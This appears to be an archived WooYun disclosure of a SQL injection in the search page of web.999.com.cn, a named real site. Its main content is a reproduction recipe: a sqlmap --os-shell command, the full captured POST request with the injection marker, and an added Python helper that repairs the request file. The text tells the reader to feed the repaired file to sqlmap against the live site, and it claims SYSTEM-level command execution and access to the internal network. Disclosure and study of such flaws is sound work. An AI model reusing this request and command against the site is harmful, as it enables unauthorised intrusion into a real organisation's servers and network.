WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2014-11-26: Details reported to the vendor, awaiting vendor handling. 2014-12-01: Vendor chose to ignore the vulnerability; details disclosed to the public.
The internal network is fully within reach; a pity I don't enjoy playing around in intranets, so what now?
The injection point is in the search function: http://web.999.com.cn/sj/pro.aspx?tiao=1
Running sqlmap with the options below yields a shell with SYSTEM privileges that executes arbitrary commands:
sqlmap.py -r 999.txt --os-shell
Contents of 999.txt (the line breaks were mangled in the code area; when copy-pasting to reproduce, restore them so the HTTP request is well-formed):
POST /sj/pro.aspx?tiao=1 HTTP/1.1
Host: web.999.com.cn
Proxy-Connection: keep-alive
Content-Length: 3347
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://web.999.com.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 UBrowser/3.1.1644.34 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://web.999.com.cn/sj/pro.aspx?tiao=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=vucq3piurlfvow45aifti1rb

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNDc3OTgyOTkwD2QWAmYPZBYCAgMPZBYGAgUPFgIeC18hSXRlbUNvdW50AgwWGGYPZBYCZg8VAhFwcm8uYXNweD9UeXBlaWQ9Ng%2FooaXnm4rosIPnkIboja9kAgEPZBYCZg8VAhFwcm8uYXNweD9UeXBlaWQ9OAnmipfnlJ%2FntKBkAgIPZBYCZg8VAhJwcm8uYXNweD9UeXBlaWQ9MTIP5Lit6I2v5rOo5bCE5YmCZAIDD2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTIP5oSf5YaS5q2i5ZKz6I2vZAIED2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTMP6IKg6IOD5raI5YyW6I2vZAIFD2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTQP56Wb6YKq5q2j5L2T6I2vZAIGD2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTUP55qu6IKk5aSW55So6I2vZAIHD2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTcM5aaH56eR55So6I2vZAIID2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTkM5oqX6IK%2F55ik6I2vZAIJD2QWAmYPFQIScHJvLmFzcHg%2FVHlwZWlkPTEwDOmFjeaWuemil%2BeykmQCCg9kFgJmDxUCEnByby5hc3B4P1R5cGVpZD0xMQ%2FmuIXng63op6Pmr5Loja9kAgsPZBYCZg8VAhJwcm8uYXNweD9UeXBlaWQ9MTMG5YW25LuWZAIHD2QWCAIBD2QWBAIBDw8WAh4EVGV4dAUM6I2v5ZOB5pCc57SiZGQCAw8WAh8AZmQCAw8PFgIfAQUM6I2v5ZOB5pCc57SiZGQCBQ8WAh8AZmQCBw8PFgYeCFBhZ2VTaXplAgoeC1JlY29yZGNvdW50Zh4QQ3VycmVudFBhZ2VJbmRleAIBZGQCCQ8WAh8BBaELPGRpdiBjbGFzcz0ibGluazEiPjx1bD48bGk%2BPGEgaHJlZj0iaHR0cDovLzk5OWdtbC5jb20uY24vIiAgIHRhcmdldD0iX2JsYW5rIj45OTnmhJ%2FlhpLngbU8L2E%2BPC9saT48L3VsPjx1bD48bGk%2BPGEgaHJlZj0iaHR0cDovL3d3dy45OTlweXAuY29tLyIgICB0YXJnZXQ9Il9ibGFuayI%2B55qu6IKk6I2v5a625pePPC9hPjwvbGk%2BPC91bD48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cuOTk5LmNvbS5jbiIgICB0YXJnZXQ9Il9ibGFuayI%2B5Y2O5ram5LiJ5Lmd5Yy76I2v6IKh5Lu95pyJ6ZmQ5YWs5Y%2B4PC9hPjwvbGk%2BPC91bD48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly85OTlwaGFybS5jb20uY24vcHJvLmFzcCIgICB0YXJnZXQ9Il9ibGFuayI%2B5rex5Zyz5LiJ5Lmd5Lit5Yy76I2v5oqV6LWE5Y%2BR5bGV5pyJ6ZmQ5YWs5Y%2B4PC9hPjwvbGk%2BPC91bD48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cuMzl6eS5jb20iICAgdGFyZ2V0PSJfYmxhbmsiPua3seWcs%2BW4guS4ieS5neeOsOS7o%2BS4reiNr%2BaciemZkOWFrOWPuDwvYT48L2xpPjwvdWw%2BPHVsPjxsaT48YSBocmVmPSJodHRwOi8vd3d3Lmdvc3VuY2hpbmEuY29tIiAgIHRhcmdldD0iX2JsYW5rIj7mt7HlnLPkuZ3mlrDoja%2FkuJrmnInpmZDlhazlj7g8L2E%2BPC9saT48L3VsPjwvZGl2PjxkaXYgY2xhc3M9ImxpbmsxIj48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cuYWhqYy5jbiIgICB0YXJnZXQ9Il9ibGFuayI%2B5a6J5b696YeR6J%2B%2B55Sf5YyW6IKh5Lu95pyJ6ZmQ5YWs5Y%2B4PC9hPjwvbGk%2BPC91bD48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cueWE5OTkuY29tLyIgICB0YXJnZXQ9Il9ibGFuayI%2B6ZuF5a6J5LiJ5Lmd6I2v5Lia5pyJ6ZmQ5YWs5Y%2B4PC9hPjwvbGk%2BPC91bD48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cuOTk5YmouY29tIiAgIHRhcmdldD0iX2JsYW5rIj7ljJfkuqzkuInkuZ3oja%2FkuJrmnInpmZDlhazlj7g8L2E%2BPC9saT48L3VsPjx1bD48bGk%2BPGEgaHJlZj0iaHR0cDovL3d3dy45OTlqeC5jb20uY24iICAgdGFyZ2V0PSJfYmxhbmsiPuaxn%2Bilv%2BS4ieS5neiNr%2BS4muaciemZkOWFrOWPuDwvYT48L2xpPjwvdWw%2BPHVsPjxsaT48YSBocmVmPSJodHRwOi8vc2RzYW5qaXV5eS5iaXp0eC5jbi8iICAgdGFyZ2V0PSJfYmxhbmsiPuWxseS4nOS4ieS5neiNr%2BS4muaciemZkOWFrOWPuDwvYT48L2xpPjwvdWw%2BPHVsPjxsaT48YSBocmVmPSJodHRwOi8vd3d3Ljk5OW5rLmNuIiAgIHRhcmdldD0iX2JsYW5rIj7muZbljZfkuInkuZ3ljZflvIDliLboja%2FmnInpmZDlhazlj7g8L2E%2BPC9saT48L3VsPjwvZGl2PjxkaXYgY2xhc3M9ImxpbmsxIj48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cuOTk5bmluZXN0YXIuY29tIiAgIHRhcmdldD0iX2JsYW5rIj7mt7HlnLPkuZ3mmJ%2FljbDliLfljIXoo4Xpm4blm6LmnInpmZDlhazlj7g8L2E%2BPC9saT48L3VsPjwvZGl2PmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFEmN0bDAwJEltYWdlQnV0dG9uMXMgz3N2dpdbmh6Fz3HjmyrXPj%2Fb&__EVENTVALIDATION=%2FwEWAwKMpsmMBgK33sGJAQLssvLQAxoyWrcK7rrKvmTSrKtmUzqiYq4L&ctl00%24TextBox1=%E4%B8%89%E4%B9%9D*&ctl00%24ImageButton1.x=19&ctl00%24ImageButton1.y=10
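The request file is the fragile part of this reproduction: once it has been pasted through a web page, the CRLF line endings are gone, the blank line separating headers from body may be missing, a long __VIEWSTATE can be wrapped mid-value, and the Content-Length no longer matches the body. sqlmap also treats a `*` inside a request file as a custom injection-point marker, so the `*` after the search term in ctl00$TextBox1 is where it will inject. The following Python is an added example, not code from the report or from sqlmap: it parses a raw request the way `-r` expects it, strips newlines that cannot legitimately occur inside a form-urlencoded body, lists the form parameters and any marked one, and re-emits the request with CRLF endings and a corrected Content-Length. The sample request is constructed; its cookie, __VIEWSTATE and __EVENTVALIDATION values are short stand-ins for the report's real ones.

```python
"""Parse and normalize a raw HTTP request of the kind sqlmap reads with -r.

Added example (not code from the original report or from sqlmap). It catches
what goes wrong when a request is copied out of a web page: lost line breaks,
a stray wrap inside the body, and a stale Content-Length. It also reports the
form parameters sqlmap will test, including any parameter carrying sqlmap's
custom injection marker '*'.
"""
import re
from urllib.parse import parse_qsl

REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) (HTTP/\d(?:\.\d)?)$")

# Constructed sample modelled on the report's request. The session id,
# __VIEWSTATE and __EVENTVALIDATION values are short placeholders.
SAMPLE_BODY = (
    "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJc3R1Yg%3D%3D"
    "&__EVENTVALIDATION=%2FwEWAXN0dWI%3D"
    "&ctl00%24TextBox1=%E4%B8%89%E4%B9%9D*"
    "&ctl00%24ImageButton1.x=19&ctl00%24ImageButton1.y=10"
)
# Simulate the copy-paste damage: a wrap inside __VIEWSTATE and a stale length.
SAMPLE_REQUEST = (
    "POST /sj/pro.aspx?tiao=1 HTTP/1.1\n"
    "Host: web.999.com.cn\n"
    "Content-Length: 9999\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "Cookie: ASP.NET_SessionId=constructedsessionid\n"
    "\n" + SAMPLE_BODY.replace("%2FwEPDwUJ", "%2FwEPDwUJ\n")
)


def parse_raw_request(text):
    """Split a raw request into its parts and cross-check the body length.

    Raises ValueError when the header/body separator or the request line is
    missing, which is what a request looks like after an HTML page ate its
    line breaks.
    """
    text = text.replace("\r\n", "\n")
    if "\n\n" not in text:
        raise ValueError("no blank line between headers and body")
    head, body = text.split("\n\n", 1)
    lines = head.split("\n")
    m = REQUEST_LINE.match(lines[0].strip())
    if not m:
        raise ValueError("malformed request line: %r" % lines[0])
    headers = []
    for line in lines[1:]:
        if not line.strip():
            continue
        if ":" not in line:
            raise ValueError("malformed header line: %r" % line)
        name, value = line.split(":", 1)
        headers.append((name.strip(), value.strip()))
    lookup = {k.lower(): v for k, v in headers}
    # A literal newline can never be part of a form-urlencoded body (it would
    # be %0A), so any newline here is a wrap introduced by copy-paste.
    if "form-urlencoded" in lookup.get("content-type", ""):
        body = body.replace("\n", "")
    params = dict(parse_qsl(body, keep_blank_values=True))
    declared = lookup.get("content-length")
    return {
        "method": m.group(1),
        "target": m.group(2),
        "version": m.group(3),
        "headers": headers,
        "host": lookup.get("host"),
        "body": body,
        "params": params,
        # Parameters whose value carries sqlmap's custom injection marker.
        "marked": [k for k, v in params.items() if "*" in v],
        "declared_length": int(declared) if declared is not None else None,
        "actual_length": len(body.encode("utf-8")),
    }


def is_well_formed(text):
    """True when the request parses; False for the mangled copy-paste case."""
    try:
        parse_raw_request(text)
        return True
    except ValueError:
        return False


def normalize_request(text):
    """Re-emit the request with CRLF line endings and a correct Content-Length.

    sqlmap drops the file's Content-Length and sets its own when sending, but a
    mismatch in the file is a cheap sign that the body was truncated or wrapped
    during copy-paste, so the value is recomputed rather than forwarded.
    """
    req = parse_raw_request(text)
    headers = [(k, v) for k, v in req["headers"] if k.lower() != "content-length"]
    if req["body"]:
        headers.append(("Content-Length", str(req["actual_length"])))
    out = ["%s %s %s" % (req["method"], req["target"], req["version"])]
    out += ["%s: %s" % (k, v) for k, v in headers]
    return "\r\n".join(out) + "\r\n\r\n" + req["body"]


if __name__ == "__main__":
    info = parse_raw_request(SAMPLE_REQUEST)
    print("injectable via marker:", info["marked"])
    print("declared vs actual length:", info["declared_length"], info["actual_length"])
    print(normalize_request(SAMPLE_REQUEST))
```

Run it on the real 999.txt after pasting and feed the normalized output to sqlmap -r; if parse_raw_request raises, the blank line between the Cookie header and the __EVENTTARGET body was lost and must be put back by hand.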
Things to note when using sqlmap: [screenshot]
SYSTEM shell: [screenshot]
Internal network information: [screenshot]
No need to worry about privilege escalation at all: --os-shell runs commands through the database service, so the shell inherits that service account's privileges, which here are SYSTEM. You get the idea.
Severity rating: No impact (vendor ignored)
Ignored at: 2014-12-01 09:58
2014-12-11: Following up